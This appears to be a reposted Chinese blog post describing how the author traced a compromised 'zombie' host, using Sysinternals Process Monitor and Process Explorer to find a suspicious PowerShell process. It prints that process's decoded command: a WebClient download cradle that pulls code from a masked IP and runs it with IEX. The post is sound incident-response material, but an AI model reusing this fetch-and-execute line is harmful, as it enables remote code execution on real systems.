今天做了对某个恶意攻击IP的溯源分析工作,把他拿下来之后,发现他的中间件日志,和系统日志都被删了。
机子上没有任何的扫描和攻击工具,
而且通过查找网站域名,发现该域名归属还是一家合法在经营的公司的官网,公司性质也和互联网技术这方面没什么关联,很明显,这只是一个肉鸡。
正当毫无思绪的时候,想到要从控制这台肉鸡可能的远控方,从找远控程序入手。
用到了以下两个工具:
ProcessMonitor(系统进程监视工具)
Process Monitor一款系统进程监视软件,总体来说,Process Monitor相当于Filemon+Regmon,其中的Filemon专门用来监视系统 中的任何文件操作过程,而Regmon用来监视注册表的读写操作过程。有了Process Monitor,使用者就可以对系统中的任何文件和 注册表操作同时进行监视和记录,通过注册表和文件读写的变化, 对于帮助诊断系统故障或是发现恶意软件、病毒或木马来说,非常 有用。这是一个高级的 Windows 系统和应用程序监视工具,由优秀的 Sysinternals 开发,并且已并入微软旗下,可靠性自不用说。
下载,安装:
https://docs.microsoft.com/zh-cn/sysinternals/downloads/procmon
将该procmon上传到需要分析的主机上:
直接点击procmon.exe就可以打开。
ProcessExplorer(Windows系统和应用程序监视工具)
由Sysinternals开发的Windows系统和应用程序监视工具,已并入微软旗下。不仅结合了Filemon(文件监视器)和Regmon(注册表监视器)两个工具的功能,还增加了多项重要的增强功能。包括稳定性和性能改进、强大的过滤选项、修正的进程树对话框(增加了进程存活时间图表)、可根据点击位置变换的右击菜单过滤条目、集成带源代码存储的堆栈跟踪对话框、更快的堆栈跟踪、可在 64位 Windows 上加载 32位 日志文件的能力、监视映像(DLL和内核模式驱动程序)加载、系统引导时记录所有操作等。
下载,安装:
https://docs.microsoft.com/zh-cn/sysinternals/downloads/process-explorer
直接点击procexp.exe就可以打开。
在电脑上发现一个可疑进程powershell.exe:
该进程一直对外发起http访问,
CMD窗口执行wmic process get >> 1.txt可导出进程信息:
如下是该可疑进程的信息:
解密如下:
$WC=New-ObjectNet.WebClient;$WC.Headers["User-Agent"]="Mozilla/PS";IEX$WC.UploadString("http://x.x.x.x/Update/PSN/DL.php","PSN");
//ip已模糊处理
得到疑是远控方IP在微步在线查询该IP为恶意IP,存在漏洞利用,攻击的行为,
虽然最后只能查到远控方的IP的归属地,其WEB服务无法访问,暂时还不能继续往下做,但是,在溯源分析方面又多了稍微一点点思路还是很开心的。
以后害怕自己电脑被入侵的时候或者做病毒,木马排查的时候,这些小姿势或许也能用得上吧。
当然,上面这些小姿势,大佬们估计老早就知道了,然而我现在才发现。。。
原文始发于微信公众号(Oriental rose):一次溯源分析的小姿势
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论